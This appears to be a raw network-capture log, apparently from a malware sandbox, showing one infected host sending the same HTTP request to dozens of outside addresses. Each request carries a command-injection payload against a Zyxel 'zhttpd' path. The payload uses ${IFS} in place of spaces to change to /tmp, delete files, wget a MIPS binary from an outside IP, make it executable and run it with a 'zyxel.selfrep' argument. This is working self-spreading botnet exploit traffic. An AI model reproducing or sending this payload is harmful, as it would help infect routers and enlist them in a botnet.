                                    Jan 13, 2024 19:02:37.254817009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5117192.168.2.1339634126.146.143.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254889011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5118192.168.2.1334368107.164.14.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254940987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5119192.168.2.1357240155.26.74.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255037069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5120192.168.2.1342178115.118.59.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255072117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5121192.168.2.135463424.253.183.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255131960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5122192.168.2.1346328192.62.18.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255198956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5123192.168.2.1356124176.109.154.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255249977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5124192.168.2.1350038170.169.103.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255305052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5125192.168.2.1345786171.142.170.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255353928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5126192.168.2.1353994183.194.225.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255362988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5127192.168.2.1340332202.164.184.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255404949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5128192.168.2.134500877.136.204.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255484104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5129192.168.2.133696291.142.238.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255548954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5130192.168.2.135034618.253.10.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255614996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5131192.168.2.1336090112.55.77.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255666971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5132192.168.2.1345084182.181.233.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255733013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5133192.168.2.133388289.232.33.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255774975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5134192.168.2.133516060.83.70.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255800009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5135192.168.2.1359502202.226.173.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255892992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5136192.168.2.1357956153.177.170.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.255968094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5137192.168.2.1342382105.173.27.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256000996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5138192.168.2.133705825.57.151.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256073952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5139192.168.2.1345334107.175.205.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256148100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5140192.168.2.1355094115.221.74.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256207943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5141192.168.2.1334552151.101.134.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256270885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5142192.168.2.133833443.225.180.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256310940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5143192.168.2.134669474.62.184.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256371021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5144192.168.2.133732048.176.184.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256407022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5145192.168.2.13344289.138.69.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256464958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5146192.168.2.135488057.75.253.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256515980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5147192.168.2.1339794175.6.190.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256582022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5148192.168.2.135406282.232.175.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256611109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5149192.168.2.1356676193.240.32.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256691933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5150192.168.2.134399220.124.99.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256717920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5151192.168.2.135734683.162.85.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256817102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5152192.168.2.1341216190.129.216.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256838083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5153192.168.2.135181670.249.0.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256901979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5154192.168.2.134311680.255.10.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.256942987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5155192.168.2.135183035.202.147.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257000923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5156192.168.2.133389094.152.223.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257057905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5157192.168.2.133610448.207.202.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257097960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5158192.168.2.1342618208.200.193.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257138014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5159192.168.2.135421470.20.149.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257188082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5160192.168.2.1333992103.254.149.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257251024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5161192.168.2.1335438162.36.90.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257287025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5162192.168.2.133323813.139.135.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257333040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5163192.168.2.134080017.133.16.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257383108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5164192.168.2.133484434.139.217.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257431030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5165192.168.2.134202865.179.195.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257467985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5166192.168.2.133445617.251.88.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257539988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5167192.168.2.1353982129.168.108.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257596970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5168192.168.2.13469285.36.87.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257643938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5169192.168.2.133734640.139.42.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257709980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5170192.168.2.1348604221.45.84.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257730961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5171192.168.2.1354768204.66.28.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257797003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5172192.168.2.134075654.64.37.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257848978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5173192.168.2.1350248203.63.144.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257900000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5174192.168.2.133899220.8.51.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257956028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5175192.168.2.1354426120.170.71.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.257999897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5176192.168.2.134936268.105.178.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258069992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5177192.168.2.134513254.172.237.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258105993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5178192.168.2.1353670101.78.228.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.258167028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5179192.168.2.13436684.248.150.167443
                                    TimestampBytes transferredDirectionData
